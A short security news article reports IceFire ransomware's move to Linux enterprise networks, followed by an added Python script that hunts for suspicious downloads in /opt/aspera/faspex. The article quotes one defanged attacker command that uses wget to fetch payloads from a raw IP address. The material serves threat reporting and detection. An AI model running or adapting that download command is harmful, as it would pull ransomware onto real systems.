Security analysts at SentinelOne recently learned that the infamous IceFire ransomware has been found attacking both Windows and Linux enterprise networks.
An IceFire ransomware attack encrypts the files of the victim and demands payment in exchange for the key to decrypt them. This malware has been responsible for a great deal of damage, both to the personal computers of individuals and the computers of large organizations, since it was first discovered in 2020.
In recent weeks, hackers have been deploying the “IceFire” ransomware against Linux enterprise networks, a large shift from its previous usage against Windows-based networks. These attacks are mainly launched against Linux networks connected to the Internet.
IceFire Ransomware Linux & Windows
According to the analysis, the IceFire Linux version is a 2.18 MB binary compiled with gcc for the AMD64 architecture.
A sample of IceFire was tested on Ubuntu and Debian, two Intel-based distributions; both test systems successfully ran IceFire. The system used wget to download two payloads, which were saved to /opt/aspera/faspex:
sh -c rm -f demo iFire && wget hxxp[://]159.65.217.216:8080/demo && wget hxxp[://]159.65.217.216:8080/{redact ..
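The download behaviour described above can be hunted for in process-execution telemetry. The following is an added example, not code from the article or from SentinelOne: it flags download tools run inside /opt/aspera/faspex and notes when the source is a raw IP address. The `cwd=... cmd=...` record format, the `triage` function, the inclusion of curl and the sample records are assumptions made for illustration.

```python
import ipaddress
import posixpath
import re
from urllib.parse import urlsplit

WATCH_DIR = "/opt/aspera/faspex"   # download directory named in the article
DOWNLOADERS = {"wget", "curl"}     # the article shows wget; curl is an added assumption

def in_watch_dir(cwd):
    """True for WATCH_DIR or a real subdirectory, not look-alikes such as faspex_old."""
    norm = posixpath.normpath(cwd)
    return norm == WATCH_DIR or norm.startswith(WATCH_DIR + "/")

def has_raw_ip_url(args):
    """True if any argument is an http(s) URL whose host is an IP literal."""
    for arg in args:
        if not re.match(r"https?://", arg, re.I):
            continue
        try:
            ipaddress.ip_address(urlsplit(arg).hostname or "")
            return True
        except ValueError:
            continue
    return False

def triage(record):
    """Return sorted reasons why one 'cwd=<dir> cmd=<command line>' record is suspicious."""
    m = re.match(r"cwd=(\S+) cmd=(.*)", record)
    if not m or not in_watch_dir(m.group(1)):
        return []
    reasons = set()
    cmd = m.group(2).replace('"', " ").replace("'", " ")   # drop quoting around sh -c bodies
    for part in re.split(r"&&|\|\||[;|]", cmd):             # examine each chained command
        argv = part.split()
        if argv[:2] in (["sh", "-c"], ["bash", "-c"]):      # look past the shell wrapper
            argv = argv[2:]
        if argv and posixpath.basename(argv[0]) in DOWNLOADERS:
            reasons.add("download tool run in " + WATCH_DIR)
            if has_raw_ip_url(argv[1:]):
                reasons.add("download from a raw IP address")
    return sorted(reasons)

# Constructed records (hypothetical format); 192.0.2.10 is a documentation address.
SAMPLES = [
    "cwd=/opt/aspera/faspex cmd=sh -c rm -f demo && wget http://192.0.2.10:8080/demo",
    "cwd=/opt/aspera/faspex/tmp cmd=/usr/bin/wget https://updates.example.com/pkg.tgz",
    "cwd=/opt/aspera/faspex_old cmd=wget http://192.0.2.10/x",
]

if __name__ == "__main__":
    for rec in SAMPLES:
        print(triage(rec) or "clean", "<-", rec)
```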